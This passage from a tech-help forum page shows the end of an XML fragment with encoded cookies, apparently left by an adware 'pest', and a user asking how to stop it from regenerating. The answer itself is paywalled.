value="0"/></internal_state></CAMPAIGN></CAMPAIGNLIST><COOKIES><COOKIE>ip=ODcuNjAuOTYuOTA#</COOKIE><COOKIE>country=REs#</COOKIE><COOKIE>network=Ym0#</COOKIE></COOKIES></ROOT>

Has anyone got ANY idea how to remove the mechanism that regenerates this pest? The IP address resolves to Breda in Holland.

Start your free trial to view this solution

Question Stats

Zone: Software

Question Asked By: steve0412

Solution Provided By: IndiGenus

Participating Experts: 5

Solution Grade: A

Translate:

Loading Advertisement...